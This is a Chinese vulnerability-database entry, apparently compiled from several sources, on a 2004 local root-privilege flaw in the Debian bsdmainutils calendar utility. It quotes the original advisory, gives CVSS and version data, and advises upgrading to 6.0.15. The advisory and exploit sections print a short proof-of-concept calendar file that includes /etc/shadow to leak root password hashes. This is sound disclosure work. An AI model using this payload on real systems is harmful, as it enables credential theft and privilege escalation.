发布时间 :2004-10-20 00:00:00
修订时间 :2016-10-17 22:49:03

[原文]The calendar program in bsdmainutils 6.0 through 6.0.14 does not drop root privileges when executed with the -a flag, which allows attackers to execute arbitrary commands via a calendar event file.


        Debian bsdmainutils包含Calendar工具,此工具可通知用户将要发生的事件。
        #define root Jun. 28cut_here
        Jun. 28Birthday of Steven Van Acker
        Aug. 19Birthday of Andrew Griffith

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

cpe:/a:debian:bsdmainutils:6.0.10Debian bsdmainutils 6.0.10
cpe:/a:debian:bsdmainutils:6.0.6Debian bsdmainutils 6.0.6
cpe:/a:debian:bsdmainutils:6.0.9Debian bsdmainutils 6.0.9
cpe:/a:debian:bsdmainutils:6.0.8Debian bsdmainutils 6.0.8
cpe:/a:debian:bsdmainutils:6.0.11Debian bsdmainutils 6.0.11
cpe:/a:debian:bsdmainutils:6.0.12Debian bsdmainutils 6.0.12
cpe:/a:debian:bsdmainutils:6.0.13Debian bsdmainutils 6.0.13
cpe:/a:debian:bsdmainutils:6.0.3Debian bsdmainutils 6.0.3
cpe:/a:debian:bsdmainutils:6.0.2Debian bsdmainutils 6.0.2
cpe:/a:debian:bsdmainutils:6.0.5Debian bsdmainutils 6.0.5
cpe:/a:debian:bsdmainutils:6.0.4Debian bsdmainutils 6.0.4
cpe:/a:debian:bsdmainutils:6.0.1Debian bsdmainutils 6.0.1
cpe:/a:debian:bsdmainutils:6.0.14Debian bsdmainutils 6.0.14
cpe:/a:debian:bsdmainutils:6.0Debian bsdmainutils 6.0
cpe:/a:debian:bsdmainutils:6.0.7Debian bsdmainutils 6.0.7

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040830 Possible root compromose with bsdmainutils 6.0.x < 6.0.15 (Debian testing/unstable)
(PATCH)  XF  bsdmainutils-calendar-gain-privileges(17162)

- 漏洞信息

高危 权限许可和访问控制
2004-10-20 00:00:00 2005-10-20 00:00:00
        Debian bsdmainutils包含Calendar工具,此工具可通知用户将要发生的事件。
        #define root Jun. 28cut_here
        Jun. 28Birthday of Steven Van Acker
        Aug. 19Birthday of Andrew Griffith

- 公告与补丁


- 漏洞信息 (F34223)

calendar_advisory.txt (PacketStormID:F34223)
2004-09-02 00:00:00
Steven Van Acker  

The bsdmainutils package versions below 6.0.15 allow for a local root compromise via the calendar program.

Possible root compromise with calendar (bsdmainutils 6.0.x < 6.0.15)


The calendar utility is a handy little tool that informs you about upcoming
events. Each user can define his/her own calendar events. In Debian 
 (and possibly other distributions as this option is builtin in calendar),
calendar can be run from cron so that users get upcoming event notifications
by mail.
This can be abused to gain root access.

This vulnerability is also known CAN-2004-0793.

Systems affected

Debian testing and Debian unstable with the bsdmainutils package installed.
(Versions 6.0 to 6.0.14 are vulnerable, >=6.0.15 is not)

How calendar works

The calendar program uses event files with this format:

<date><tab><event description>

This is not all however. Calender gives users the ability to include other
event-files and define variables and macro's. To do this, it calls cpp (the C
preprocessor) on the main event file and processes the output.

When called with the "-a" option, calendar will processes the event files of
all users and send the result by mail.

The bsdmainutils package in Debian uses this feature from
Luckily, it is not enabled by default since you have to uncomment an "exit 0"
line in the cron script to activate it.

The problem

Calendar does not drop its privileges. In order to be useful when running with
the "-a" option, it needs to run as root.
By creating an event file as follows, we can get the hashed root password (on
June 28th ;) :

#define root Jun. 28<tab>cut_here
#include </etc/shadow>
Jun. 28<tab>Birthday of Steven Van Acker
Aug. 19<tab>Birthday of Andrew Griffith

(<tab> indicates an actual tab, so char '\t')

Since calendar is running as root, there will be no problem accessing the
shadow password file. The result contains the hashed password of root, which
can then be cracked.


Quick fix: don't run "calendar -a" as root !
Graham Wilson (the bsdmainutils package maintainer for Debian) has provided a
fix for this issue. Please upgrade the package :)

Thanks to Graham Wilson for solving the problem and Jacques A. Vidrine
(FreeBSD) for keeping me from making a foolish mistake ;)

-- Steven

PS: happy birthday andrewg! ;)

Steven Van Acker

[ Need a challenge ?                  ]
[    Visit ]


- 漏洞信息

bsdmainutils calendar Event File Local Privilege Escalation
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

bsdmainutils contains a flaw with the calendar utility that may lead to an unauthorized information disclosure. The issue is triggered when a user creates a specially crafted event file, which may result in the user viewing arbitrary files with root privileges resulting in a loss of confidentiality.

- 时间线

2004-08-30 Unknow
2004-08-30 Unknow

- 解决方案

Upgrade to version 6.0.15 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Implement the fix released by Debian if applicable

- 相关参考

- 漏洞作者

- 漏洞信息

Bsdmainutils Calendar Information Disclosure Vulnerability
Access Validation Error 11077
No Yes
2004-08-31 12:00:00 2009-07-12 07:06:00
Steven Van Acker <> disclosed this vulnerability.

- 受影响的程序版本

Debian bsdmainutils 6.0.14
Debian bsdmainutils 6.0.15

- 不受影响的程序版本

Debian bsdmainutils 6.0.15

- 漏洞讨论

The calendar utility contained in the bsdmainutils package on Debian GNU/Linux systems is reported susceptible to an information disclosure vulnerability. This is due to a lack of proper file authorization checks by the application.

The application fails to enforce permissions of included files when run as the superuser with the '-a' argument, therefore it is possible for a local attacker to create a calendar file that will disclose the contents of arbitrary, potentially sensitive files. This may aid them in further attacks against the affected computer.

By default, the package is installed with a crontab file that will not call the calendar utility. Systems are only affected if the crontab is enabled by administrators.

Debian GNU/Linux computers with bsdmainutils versions prior to 6.0.15 are reported to be vulnerable.

- 漏洞利用

An exploit is not required. An example calendar file sufficient to exploit this vulnerability was provided. This file would likely be located in '~/.calendar/calendar':

#define root Jun. 28&lt;tab&gt;cut_here
#include &lt;/etc/shadow&gt;
Jun. 28&lt;tab&gt;Birthday of Steven Van Acker
Aug. 19&lt;tab&gt;Birthday of Andrew Griffith

(where &lt;tab&gt; should be replaced by an actual Tab character)

- 解决方案

Debian has released version 6.0.15 of bsdmainutils for the unstable branch. Users of affected packages are urged to use Debians package management utilities to upgrade to the latest version of bsdmainutils.

- 相关参考